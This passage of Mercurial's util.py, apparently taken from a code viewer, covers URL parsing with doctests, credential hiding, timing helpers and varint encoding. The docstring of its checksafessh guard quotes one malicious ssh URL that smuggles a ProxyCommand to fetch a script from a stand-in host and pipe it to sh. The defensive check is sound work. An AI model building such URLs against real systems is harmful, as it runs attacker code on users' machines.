2945 2956 fragment, which is set to '' if present but empty.
2946 2957
2947 2958 If parsefragment is False, fragment is included in query. If
2948 2959 parsequery is False, query is included in path. If both are
2949 2960 False, both fragment and query are included in path.
2950 2961
2951 2962 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2952 2963
2953 2964 Note that for backward compatibility reasons, bundle URLs do not
2954 2965 take host names. That means 'bundle://../' has a path of '../'.
2955 2966
2956 2967 Examples:
2957 2968
2958 2969 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2959 2970 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2960 2971 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2961 2972 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2962 2973 >>> url(b'file:///home/joe/repo')
2963 2974 <url scheme: 'file', path: '/home/joe/repo'>
2964 2975 >>> url(b'file:///c:/temp/foo/')
2965 2976 <url scheme: 'file', path: 'c:/temp/foo/'>
2966 2977 >>> url(b'bundle:foo')
2967 2978 <url scheme: 'bundle', path: 'foo'>
2968 2979 >>> url(b'bundle://../foo')
2969 2980 <url scheme: 'bundle', path: '../foo'>
2970 2981 >>> url(br'c:\foo\bar')
2971 2982 <url path: 'c:\\foo\\bar'>
2972 2983 >>> url(br'\\blah\blah\blah')
2973 2984 <url path: '\\\\blah\\blah\\blah'>
2974 2985 >>> url(br'\\blah\blah\blah#baz')
2975 2986 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2976 2987 >>> url(br'file:///C:\users\me')
2977 2988 <url scheme: 'file', path: 'C:\\users\\me'>
2978 2989
2979 2990 Authentication credentials:
2980 2991
2981 2992 >>> url(b'ssh://joe:xyz@x/repo')
2982 2993 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2983 2994 >>> url(b'ssh://joe@x/repo')
2984 2995 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2985 2996
2986 2997 Query strings and fragments:
2987 2998
2988 2999 >>> url(b'http://host/a?b#c')
2989 3000 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2990 3001 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2991 3002 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2992 3003
2993 3004 Empty path:
2994 3005
2995 3006 >>> url(b'')
2996 3007 <url path: ''>
2997 3008 >>> url(b'#a')
2998 3009 <url path: '', fragment: 'a'>
2999 3010 >>> url(b'http://host/')
3000 3011 <url scheme: 'http', host: 'host', path: ''>
3001 3012 >>> url(b'http://host/#a')
3002 3013 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3003 3014
3004 3015 Only scheme:
3005 3016
3006 3017 >>> url(b'http:')
3007 3018 <url scheme: 'http'>
3008 3019 """
3009 3020
3010 3021 _safechars = b"!~*'()+"
3011 3022 _safepchars = b"/!~*'()+:\\"
3012 3023 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3013 3024
3014 3025 def __init__(self, path, parsequery=True, parsefragment=True):
3015 3026 # We slowly chomp away at path until we have only the path left
3016 3027 self.scheme = self.user = self.passwd = self.host = None
3017 3028 self.port = self.path = self.query = self.fragment = None
3018 3029 self._localpath = True
3019 3030 self._hostport = b''
3020 3031 self._origpath = path
3021 3032
3022 3033 if parsefragment and b'#' in path:
3023 3034 path, self.fragment = path.split(b'#', 1)
3024 3035
3025 3036 # special case for Windows drive letters and UNC paths
3026 3037 if hasdriveletter(path) or path.startswith(b'\\\\'):
3027 3038 self.path = path
3028 3039 return
3029 3040
3030 3041 # For compatibility reasons, we can't handle bundle paths as
3031 3042 # normal URLS
3032 3043 if path.startswith(b'bundle:'):
3033 3044 self.scheme = b'bundle'
3034 3045 path = path[7:]
3035 3046 if path.startswith(b'//'):
3036 3047 path = path[2:]
3037 3048 self.path = path
3038 3049 return
3039 3050
3040 3051 if self._matchscheme(path):
3041 3052 parts = path.split(b':', 1)
3042 3053 if parts[0]:
3043 3054 self.scheme, path = parts
3044 3055 self._localpath = False
3045 3056
3046 3057 if not path:
3047 3058 path = None
3048 3059 if self._localpath:
3049 3060 self.path = b''
3050 3061 return
3051 3062 else:
3052 3063 if self._localpath:
3053 3064 self.path = path
3054 3065 return
3055 3066
3056 3067 if parsequery and b'?' in path:
3057 3068 path, self.query = path.split(b'?', 1)
3058 3069 if not path:
3059 3070 path = None
3060 3071 if not self.query:
3061 3072 self.query = None
3062 3073
3063 3074 # // is required to specify a host/authority
3064 3075 if path and path.startswith(b'//'):
3065 3076 parts = path[2:].split(b'/', 1)
3066 3077 if len(parts) > 1:
3067 3078 self.host, path = parts
3068 3079 else:
3069 3080 self.host = parts[0]
3070 3081 path = None
3071 3082 if not self.host:
3072 3083 self.host = None
3073 3084 # path of file:///d is /d
3074 3085 # path of file:///d:/ is d:/, not /d:/
3075 3086 if path and not hasdriveletter(path):
3076 3087 path = b'/' + path
3077 3088
3078 3089 if self.host and b'@' in self.host:
3079 3090 self.user, self.host = self.host.rsplit(b'@', 1)
3080 3091 if b':' in self.user:
3081 3092 self.user, self.passwd = self.user.split(b':', 1)
3082 3093 if not self.host:
3083 3094 self.host = None
3084 3095
3085 3096 # Don't split on colons in IPv6 addresses without ports
3086 3097 if (
3087 3098 self.host
3088 3099 and b':' in self.host
3089 3100 and not (
3090 3101 self.host.startswith(b'[') and self.host.endswith(b']')
3091 3102 )
3092 3103 ):
3093 3104 self._hostport = self.host
3094 3105 self.host, self.port = self.host.rsplit(b':', 1)
3095 3106 if not self.host:
3096 3107 self.host = None
3097 3108
3098 3109 if (
3099 3110 self.host
3100 3111 and self.scheme == b'file'
3101 3112 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3102 3113 ):
3103 3114 raise error.Abort(
3104 3115 _(b'file:// URLs can only refer to localhost')
3105 3116 )
3106 3117
3107 3118 self.path = path
3108 3119
3109 3120 # leave the query string escaped
3110 3121 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3111 3122 v = getattr(self, a)
3112 3123 if v is not None:
3113 3124 setattr(self, a, urlreq.unquote(v))
3114 3125
3115 3126 @encoding.strmethod
3116 3127 def __repr__(self):
3117 3128 attrs = []
3118 3129 for a in (
3119 3130 b'scheme',
3120 3131 b'user',
3121 3132 b'passwd',
3122 3133 b'host',
3123 3134 b'port',
3124 3135 b'path',
3125 3136 b'query',
3126 3137 b'fragment',
3127 3138 ):
3128 3139 v = getattr(self, a)
3129 3140 if v is not None:
3130 3141 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3131 3142 return b'<url %s>' % b', '.join(attrs)
3132 3143
3133 3144 def __bytes__(self):
3134 3145 r"""Join the URL's components back into a URL string.
3135 3146
3136 3147 Examples:
3137 3148
3138 3149 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3139 3150 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3140 3151 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3141 3152 'http://user:pw@host:80/?foo=bar&baz=42'
3142 3153 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3143 3154 'http://user:pw@host:80/?foo=bar%3dbaz'
3144 3155 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3145 3156 'ssh://user:pw@[::1]:2200//home/joe#'
3146 3157 >>> bytes(url(b'http://localhost:80//'))
3147 3158 'http://localhost:80//'
3148 3159 >>> bytes(url(b'http://localhost:80/'))
3149 3160 'http://localhost:80/'
3150 3161 >>> bytes(url(b'http://localhost:80'))
3151 3162 'http://localhost:80/'
3152 3163 >>> bytes(url(b'bundle:foo'))
3153 3164 'bundle:foo'
3154 3165 >>> bytes(url(b'bundle://../foo'))
3155 3166 'bundle:../foo'
3156 3167 >>> bytes(url(b'path'))
3157 3168 'path'
3158 3169 >>> bytes(url(b'file:///tmp/foo/bar'))
3159 3170 'file:///tmp/foo/bar'
3160 3171 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3161 3172 'file:///c:/tmp/foo/bar'
3162 3173 >>> print(url(br'bundle:foo\bar'))
3163 3174 bundle:foo\bar
3164 3175 >>> print(url(br'file:///D:\data\hg'))
3165 3176 file:///D:\data\hg
3166 3177 """
3167 3178 if self._localpath:
3168 3179 s = self.path
3169 3180 if self.scheme == b'bundle':
3170 3181 s = b'bundle:' + s
3171 3182 if self.fragment:
3172 3183 s += b'#' + self.fragment
3173 3184 return s
3174 3185
3175 3186 s = self.scheme + b':'
3176 3187 if self.user or self.passwd or self.host:
3177 3188 s += b'//'
3178 3189 elif self.scheme and (
3179 3190 not self.path
3180 3191 or self.path.startswith(b'/')
3181 3192 or hasdriveletter(self.path)
3182 3193 ):
3183 3194 s += b'//'
3184 3195 if hasdriveletter(self.path):
3185 3196 s += b'/'
3186 3197 if self.user:
3187 3198 s += urlreq.quote(self.user, safe=self._safechars)
3188 3199 if self.passwd:
3189 3200 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3190 3201 if self.user or self.passwd:
3191 3202 s += b'@'
3192 3203 if self.host:
3193 3204 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3194 3205 s += urlreq.quote(self.host)
3195 3206 else:
3196 3207 s += self.host
3197 3208 if self.port:
3198 3209 s += b':' + urlreq.quote(self.port)
3199 3210 if self.host:
3200 3211 s += b'/'
3201 3212 if self.path:
3202 3213 # TODO: similar to the query string, we should not unescape the
3203 3214 # path when we store it, the path might contain '%2f' = '/',
3204 3215 # which we should *not* escape.
3205 3216 s += urlreq.quote(self.path, safe=self._safepchars)
3206 3217 if self.query:
3207 3218 # we store the query in escaped form.
3208 3219 s += b'?' + self.query
3209 3220 if self.fragment is not None:
3210 3221 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3211 3222 return s
3212 3223
3213 3224 __str__ = encoding.strmethod(__bytes__)
3214 3225
3215 3226 def authinfo(self):
3216 3227 user, passwd = self.user, self.passwd
3217 3228 try:
3218 3229 self.user, self.passwd = None, None
3219 3230 s = bytes(self)
3220 3231 finally:
3221 3232 self.user, self.passwd = user, passwd
3222 3233 if not self.user:
3223 3234 return (s, None)
3224 3235 # authinfo[1] is passed to urllib2 password manager, and its
3225 3236 # URIs must not contain credentials. The host is passed in the
3226 3237 # URIs list because Python < 2.4.3 uses only that to search for
3227 3238 # a password.
3228 3239 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3229 3240
3230 3241 def isabs(self):
3231 3242 if self.scheme and self.scheme != b'file':
3232 3243 return True # remote URL
3233 3244 if hasdriveletter(self.path):
3234 3245 return True # absolute for our purposes - can't be joined()
3235 3246 if self.path.startswith(br'\\'):
3236 3247 return True # Windows UNC path
3237 3248 if self.path.startswith(b'/'):
3238 3249 return True # POSIX-style
3239 3250 return False
3240 3251
3241 3252 def localpath(self):
3242 3253 if self.scheme == b'file' or self.scheme == b'bundle':
3243 3254 path = self.path or b'/'
3244 3255 # For Windows, we need to promote hosts containing drive
3245 3256 # letters to paths with drive letters.
3246 3257 if hasdriveletter(self._hostport):
3247 3258 path = self._hostport + b'/' + self.path
3248 3259 elif (
3249 3260 self.host is not None and self.path and not hasdriveletter(path)
3250 3261 ):
3251 3262 path = b'/' + path
3252 3263 return path
3253 3264 return self._origpath
3254 3265
3255 3266 def islocal(self):
3256 3267 '''whether localpath will return something that posixfile can open'''
3257 3268 return (
3258 3269 not self.scheme
3259 3270 or self.scheme == b'file'
3260 3271 or self.scheme == b'bundle'
3261 3272 )
3262 3273
3263 3274
3264 3275 def hasscheme(path):
3265 3276 return bool(url(path).scheme)
3266 3277
3267 3278
3268 3279 def hasdriveletter(path):
3269 3280 return path and path[1:2] == b':' and path[0:1].isalpha()
3270 3281
3271 3282
3272 3283 def urllocalpath(path):
3273 3284 return url(path, parsequery=False, parsefragment=False).localpath()
3274 3285
3275 3286
3276 3287 def checksafessh(path):
3277 3288 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3278 3289
3279 3290 This is a sanity check for ssh urls. ssh will parse the first item as
3280 3291 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3281 3292 Let's prevent these potentially exploited urls entirely and warn the
3282 3293 user.
3283 3294
3284 3295 Raises an error.Abort when the url is unsafe.
3285 3296 """
3286 3297 path = urlreq.unquote(path)
3287 3298 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3288 3299 raise error.Abort(
3289 3300 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3290 3301 )
3291 3302
3292 3303
3293 3304 def hidepassword(u):
3294 3305 '''hide user credential in a url string'''
3295 3306 u = url(u)
3296 3307 if u.passwd:
3297 3308 u.passwd = b'***'
3298 3309 return bytes(u)
3299 3310
3300 3311
3301 3312 def removeauth(u):
3302 3313 '''remove all authentication information from a url string'''
3303 3314 u = url(u)
3304 3315 u.user = u.passwd = None
3305 3316 return bytes(u)
3306 3317
3307 3318
3308 3319 timecount = unitcountfn(
3309 3320 (1, 1e3, _(b'%.0f s')),
3310 3321 (100, 1, _(b'%.1f s')),
3311 3322 (10, 1, _(b'%.2f s')),
3312 3323 (1, 1, _(b'%.3f s')),
3313 3324 (100, 0.001, _(b'%.1f ms')),
3314 3325 (10, 0.001, _(b'%.2f ms')),
3315 3326 (1, 0.001, _(b'%.3f ms')),
3316 3327 (100, 0.000001, _(b'%.1f us')),
3317 3328 (10, 0.000001, _(b'%.2f us')),
3318 3329 (1, 0.000001, _(b'%.3f us')),
3319 3330 (100, 0.000000001, _(b'%.1f ns')),
3320 3331 (10, 0.000000001, _(b'%.2f ns')),
3321 3332 (1, 0.000000001, _(b'%.3f ns')),
3322 3333 )
3323 3334
3324 3335
3325 3336 @attr.s
3326 3337 class timedcmstats(object):
3327 3338 """Stats information produced by the timedcm context manager on entering."""
3328 3339
3329 3340 # the starting value of the timer as a float (meaning and resulution is
3330 3341 # platform dependent, see util.timer)
3331 3342 start = attr.ib(default=attr.Factory(lambda: timer()))
3332 3343 # the number of seconds as a floating point value; starts at 0, updated when
3333 3344 # the context is exited.
3334 3345 elapsed = attr.ib(default=0)
3335 3346 # the number of nested timedcm context managers.
3336 3347 level = attr.ib(default=1)
3337 3348
3338 3349 def __bytes__(self):
3339 3350 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3340 3351
3341 3352 __str__ = encoding.strmethod(__bytes__)
3342 3353
3343 3354
3344 3355 @contextlib.contextmanager
3345 3356 def timedcm(whencefmt, *whenceargs):
3346 3357 """A context manager that produces timing information for a given context.
3347 3358
3348 3359 On entering a timedcmstats instance is produced.
3349 3360
3350 3361 This context manager is reentrant.
3351 3362
3352 3363 """
3353 3364 # track nested context managers
3354 3365 timedcm._nested += 1
3355 3366 timing_stats = timedcmstats(level=timedcm._nested)
3356 3367 try:
3357 3368 with tracing.log(whencefmt, *whenceargs):
3358 3369 yield timing_stats
3359 3370 finally:
3360 3371 timing_stats.elapsed = timer() - timing_stats.start
3361 3372 timedcm._nested -= 1
3362 3373
3363 3374
3364 3375 timedcm._nested = 0
3365 3376
3366 3377
3367 3378 def timed(func):
3368 3379 """Report the execution time of a function call to stderr.
3369 3380
3370 3381 During development, use as a decorator when you need to measure
3371 3382 the cost of a function, e.g. as follows:
3372 3383
3373 3384 @util.timed
3374 3385 def foo(a, b, c):
3375 3386 pass
3376 3387 """
3377 3388
3378 3389 def wrapper(*args, **kwargs):
3379 3390 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3380 3391 result = func(*args, **kwargs)
3381 3392 stderr = procutil.stderr
3382 3393 stderr.write(
3383 3394 b'%s%s: %s\n'
3384 3395 % (
3385 3396 b' ' * time_stats.level * 2,
3386 3397 pycompat.bytestr(func.__name__),
3387 3398 time_stats,
3388 3399 )
3389 3400 )
3390 3401 return result
3391 3402
3392 3403 return wrapper
3393 3404
3394 3405
3395 3406 _sizeunits = (
3396 3407 (b'm', 2 ** 20),
3397 3408 (b'k', 2 ** 10),
3398 3409 (b'g', 2 ** 30),
3399 3410 (b'kb', 2 ** 10),
3400 3411 (b'mb', 2 ** 20),
3401 3412 (b'gb', 2 ** 30),
3402 3413 (b'b', 1),
3403 3414 )
3404 3415
3405 3416
3406 3417 def sizetoint(s):
3407 3418 """Convert a space specifier to a byte count.
3408 3419
3409 3420 >>> sizetoint(b'30')
3410 3421 30
3411 3422 >>> sizetoint(b'2.2kb')
3412 3423 2252
3413 3424 >>> sizetoint(b'6M')
3414 3425 6291456
3415 3426 """
3416 3427 t = s.strip().lower()
3417 3428 try:
3418 3429 for k, u in _sizeunits:
3419 3430 if t.endswith(k):
3420 3431 return int(float(t[: -len(k)]) * u)
3421 3432 return int(t)
3422 3433 except ValueError:
3423 3434 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3424 3435
3425 3436
3426 3437 class hooks(object):
3427 3438 """A collection of hook functions that can be used to extend a
3428 3439 function's behavior. Hooks are called in lexicographic order,
3429 3440 based on the names of their sources."""
3430 3441
3431 3442 def __init__(self):
3432 3443 self._hooks = []
3433 3444
3434 3445 def add(self, source, hook):
3435 3446 self._hooks.append((source, hook))
3436 3447
3437 3448 def __call__(self, *args):
3438 3449 self._hooks.sort(key=lambda x: x[0])
3439 3450 results = []
3440 3451 for source, hook in self._hooks:
3441 3452 results.append(hook(*args))
3442 3453 return results
3443 3454
3444 3455
3445 3456 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3446 3457 """Yields lines for a nicely formatted stacktrace.
3447 3458 Skips the 'skip' last entries, then return the last 'depth' entries.
3448 3459 Each file+linenumber is formatted according to fileline.
3449 3460 Each line is formatted according to line.
3450 3461 If line is None, it yields:
3451 3462 length of longest filepath+line number,
3452 3463 filepath+linenumber,
3453 3464 function
3454 3465
3455 3466 Not be used in production code but very convenient while developing.
3456 3467 """
3457 3468 entries = [
3458 3469 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3459 3470 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3460 3471 ][-depth:]
3461 3472 if entries:
3462 3473 fnmax = max(len(entry[0]) for entry in entries)
3463 3474 for fnln, func in entries:
3464 3475 if line is None:
3465 3476 yield (fnmax, fnln, func)
3466 3477 else:
3467 3478 yield line % (fnmax, fnln, func)
3468 3479
3469 3480
3470 3481 def debugstacktrace(
3471 3482 msg=b'stacktrace',
3472 3483 skip=0,
3473 3484 f=procutil.stderr,
3474 3485 otherf=procutil.stdout,
3475 3486 depth=0,
3476 3487 prefix=b'',
3477 3488 ):
3478 3489 """Writes a message to f (stderr) with a nicely formatted stacktrace.
3479 3490 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3480 3491 By default it will flush stdout first.
3481 3492 It can be used everywhere and intentionally does not require an ui object.
3482 3493 Not be used in production code but very convenient while developing.
3483 3494 """
3484 3495 if otherf:
3485 3496 otherf.flush()
3486 3497 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3487 3498 for line in getstackframes(skip + 1, depth=depth):
3488 3499 f.write(prefix + line)
3489 3500 f.flush()
3490 3501
3491 3502
3492 3503 # convenient shortcut
3493 3504 dst = debugstacktrace
3494 3505
3495 3506
3496 3507 def safename(f, tag, ctx, others=None):
3497 3508 """
3498 3509 Generate a name that it is safe to rename f to in the given context.
3499 3510
3500 3511 f: filename to rename
3501 3512 tag: a string tag that will be included in the new name
3502 3513 ctx: a context, in which the new name must not exist
3503 3514 others: a set of other filenames that the new name must not be in
3504 3515
3505 3516 Returns a file name of the form oldname~tag[~number] which does not exist
3506 3517 in the provided context and is not in the set of other names.
3507 3518 """
3508 3519 if others is None:
3509 3520 others = set()
3510 3521
3511 3522 fn = b'%s~%s' % (f, tag)
3512 3523 if fn not in ctx and fn not in others:
3513 3524 return fn
3514 3525 for n in itertools.count(1):
3515 3526 fn = b'%s~%s~%s' % (f, tag, n)
3516 3527 if fn not in ctx and fn not in others:
3517 3528 return fn
3518 3529
3519 3530
3520 3531 def readexactly(stream, n):
3521 3532 '''read n bytes from stream.read and abort if less was available'''
3522 3533 s = stream.read(n)
3523 3534 if len(s) < n:
3524 3535 raise error.Abort(
3525 3536 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3526 3537 % (len(s), n)
3527 3538 )
3528 3539 return s
3529 3540
3530 3541
3531 3542 def uvarintencode(value):
3532 3543 """Encode an unsigned integer value to a varint.
3533 3544
3534 3545 A varint is a variable length integer of 1 or more bytes. Each byte
3535 3546 except the last has the most significant bit set. The lower 7 bits of
3536 3547 each byte store the 2's complement representation, least significant group
3537 3548 first.
3538 3549
3539 3550 >>> uvarintencode(0)
3540 3551 '\\x00'
3541 3552 >>> uvarintencode(1)
3542 3553 '\\x01'
3543 3554 >>> uvarintencode(127)
3544 3555 '\\x7f'
3545 3556 >>> uvarintencode(1337)
3546 3557 '\\xb9\\n'
3547 3558 >>> uvarintencode(65536)
3548 3559 '\\x80\\x80\\x04'
3549 3560 >>> uvarintencode(-1)
3550 3561 Traceback (most recent call last):
3551 3562 ...
3552 3563 ProgrammingError: negative value for uvarint: -1
3553 3564 """
3554 3565 if value < 0:
3555 3566 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3556 3567 bits = value & 0x7F
3557 3568 value >>= 7
3558 3569 bytes = []
3559 3570 while value:
3560 3571 bytes.append(pycompat.bytechr(0x80 | bits))
3561 3572 bits = value & 0x7F
3562 3573 value >>= 7
3563 3574 bytes.append(pycompat.bytechr(bits))
3564 3575
3565 3576 return b''.join(bytes)
3566 3577
3567 3578
3568 3579 def uvarintdecodestream(fh):
3569 3580 """Decode an unsigned variable length integer from a stream.
3570 3581
3571 3582 The passed argument is anything that has a ``.read(N)`` method.
3572 3583
3573 3584 >>> try:
3574 3585 ... from StringIO import StringIO as BytesIO
3575 3586 ... except ImportError:
3576 3587 ... from io import BytesIO
3577 3588 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3578 3589 0
3579 3590 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3580 3591 1
3581 3592 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3582 3593 127
3583 3594 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3584 3595 1337
3585 3596 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3586 3597 65536
3587 3598 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3588 3599 Traceback (most recent call last):
3589 3600 ...
3590 3601 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3591 3602 """
3592 3603 result = 0
3593 3604 shift = 0
3594 3605 while True:
3595 3606 byte = ord(readexactly(fh, 1))
3596 3607 result |= (byte & 0x7F) << shift
3597 3608 if not (byte & 0x80):
3598 3609 return result
3599 3610 shift += 7
3600 3611
3601 3612
3602 3613 # Passing the '' locale means that the locale should be set according to the
3603 3614 # user settings (environment variables).
3604 3615 # Python sometimes avoids setting the global locale settings. When interfacing
3605 3616 # with C code (e.g. the curses module or the Subversion bindings), the global
3606 3617 # locale settings must be initialized correctly. Python 2 does not initialize
3607 3618 # the global locale settings on interpreter startup. Python 3 sometimes
3608 3619 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3609 3620 # explicitly initialize it to get consistent behavior if it's not already
3610 3621 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3611 3622 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3612 3623 # if we can remove this code.
3613 3624 @contextlib.contextmanager
3614 3625 def with_lc_ctype():
3615 3626 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3616 3627 if oldloc == 'C':
3617 3628 try:
3618 3629 try:
3619 3630 locale.setlocale(locale.LC_CTYPE, '')
3620 3631 except locale.Error:
3621 3632 # The likely case is that the locale from the environment
3622 3633 # variables is unknown.
3623 3634 pass
3624 3635 yield
3625 3636 finally:
3626 3637 locale.setlocale(locale.LC_CTYPE, oldloc)
3627 3638 else:
3628 3639 yield
3629 3640
3630 3641
3631 3642 def _estimatememory():
3632 3643 """Provide an estimate for the available system memory in Bytes.
3633 3644
3634 3645 If no estimate can be provided on the platform, returns None.
3635 3646 """
3636 3647 if pycompat.sysplatform.startswith(b'win'):
3637 3648 # On Windows, use the GlobalMemoryStatusEx kernel function directly.
3638 3649 from ctypes import c_long as DWORD, c_ulonglong as DWORDLONG
3639 3650 from ctypes.wintypes import Structure, byref, sizeof, windll
3640 3651
3641 3652 class MEMORYSTATUSEX(Structure):
3642 3653 _fields_ = [
3643 3654 ('dwLength', DWORD),
3644 3655 ('dwMemoryLoad', DWORD),
3645 3656 ('ullTotalPhys', DWORDLONG),
3646 3657 ('ullAvailPhys', DWORDLONG),
3647 3658 ('ullTotalPageFile', DWORDLONG),
3648 3659 ('ullAvailPageFile', DWORDLONG),
3649 3660 ('ullTotalVirtual', DWORDLONG),
3650 3661 ('ullAvailVirtual', DWORDLONG),
3651 3662 ('ullExtendedVirtual', DWORDLONG),
3652 3663 ]
3653 3664
3654 3665 x = MEMORYSTATUSEX()
3655 3666 x.dwLength = sizeof(x)
3656 3667 windll.kernel32.GlobalMemoryStatusEx(byref(x))
3657 3668 return x.ullAvailPhys
3658 3669
3659 3670 # On newer Unix-like systems and Mac OSX, the sysconf interface
3660 3671 # can be used. _SC_PAGE_SIZE is part of POSIX; _SC_PHYS_PAGES
3661 3672 # seems to be implemented on most systems.
3662 3673 try:
3663 3674 pagesize = os.sysconf(os.sysconf_names['SC_PAGE_SIZE'])
3664 3675 pages = os.sysconf(os.sysconf_names['SC_PHYS_PAGES'])
3665 3676 return pagesize * pages
3666 3677 except OSError: # sysconf can fail
3667 3678 pass
3668 3679 except KeyError: # unknown parameter
3669 3680 pass
General Comments 0
You need to be logged in to leave comments. Login now